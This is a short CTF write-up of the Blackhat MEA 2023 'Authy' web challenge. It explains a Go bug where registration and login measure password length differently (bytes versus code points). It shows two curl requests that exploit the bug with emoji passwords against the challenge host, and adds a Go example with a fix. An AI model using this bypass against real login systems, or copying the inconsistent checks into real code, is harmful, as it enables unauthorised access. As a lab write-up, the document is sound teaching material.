Blackhat_mea_2023

Blackhat MEA 2023 CTF writeup

We participated in this CTF as Chasing X fr334aks X L3v3l 6 and managed to get position 178. It wasn’t easy. I managed to solve the web challenge below.

Authy

For this challenge we are provided with an API endpoint and the challenge source.

According to the LoginController.go file, we can create a user and log in. The user's password length should not be less than 6.

The vulnerability is that the password value checked in the registration function is not the same value that is compared in the login function. To get the flag we have to log in with a password of length < 6.

The vulnerable code:

// registration

if len(user.Password) < 6 {
	log.Error("Password too short")
	resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, "Password too short", "EXT_REF"))
	return resp
}

// login

if len(password) < 6 {
	flag := os.Getenv("FLAG")
	res := &Flag{
		Flag: flag,
	}
	resp := c.JSON(http.StatusOK, res)
	log.Info()
	return resp
}

With my vast CTF experience I could tell what I needed to do :)

The logic is:

name := "😃" // contains 1 emoji character

lengthOfString := len(name)            // length of the string in bytes: 4 (UTF-8 encoding)
lengthOfRuneSlice := len([]rune(name)) // length of the rune slice in code points: 1

So I sent the registration request with the password as two smileys and logged in with the same password. In the backend, the register will see a length of 8 and login will see a length of 2, thus solving the challenge.

curl -X POST -H "Content-Type: application/json" -d '{"Username": "ping", "Password": "🤣🤣", "Firstname": "John", "Lastname": "Doe"}' http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration


curl -X POST -H "Content-Type: application/json" -d '{"Username": "ping", "Password": "🤣🤣"}'  http://af78671fe39ff1e0e18d2.playat.flagyard.com/login
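
The byte-versus-code-point mismatch described above, next to a single shared check that removes it, as an added Go example that is not the challenge's source code. It assumes the login handler measures the password in runes, as the length of 2 in the write-up implies; all function names and sample inputs are hypothetical.

```go
package main

import (
	"fmt"
	"unicode/utf8"
)

const minLen = 6 // minimum password length from the challenge source

// registerAccepts mirrors the registration check: len() on a Go string
// counts UTF-8 bytes, so two 4-byte emoji measure 8.
func registerAccepts(password string) bool {
	return len(password) >= minLen
}

// loginSeesShort models the login check. Assumption: login measures code
// points ([]rune), which is what makes the same password measure 2.
func loginSeesShort(password string) bool {
	return len([]rune(password)) < minLen
}

// mismatch reports a password that registration accepts but login treats
// as shorter than the minimum, i.e. the two handlers disagree.
func mismatch(password string) bool {
	return registerAccepts(password) && loginSeesShort(password)
}

// validPassword is the hardened form: one policy function, one unit
// (code points), meant to be called from both handlers.
func validPassword(password string) bool {
	return utf8.ValidString(password) &&
		utf8.RuneCountInString(password) >= minLen
}

func main() {
	// Constructed sample inputs.
	samples := []string{"🤣🤣", "h\u00e9llo", "abcdef", "abc"}
	for _, pw := range samples {
		fmt.Printf("%-8q bytes=%d runes=%d mismatch=%-5t valid=%t\n",
			pw, len(pw), utf8.RuneCountInString(pw),
			mismatch(pw), validPassword(pw))
	}
}
```

Any password containing multi-byte characters can fall between the two checks, not only emoji: "héllo" is 6 bytes but 5 code points.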


The CTF was great, and see you in the next one.

Licensed under CC BY-NC-SA 4.0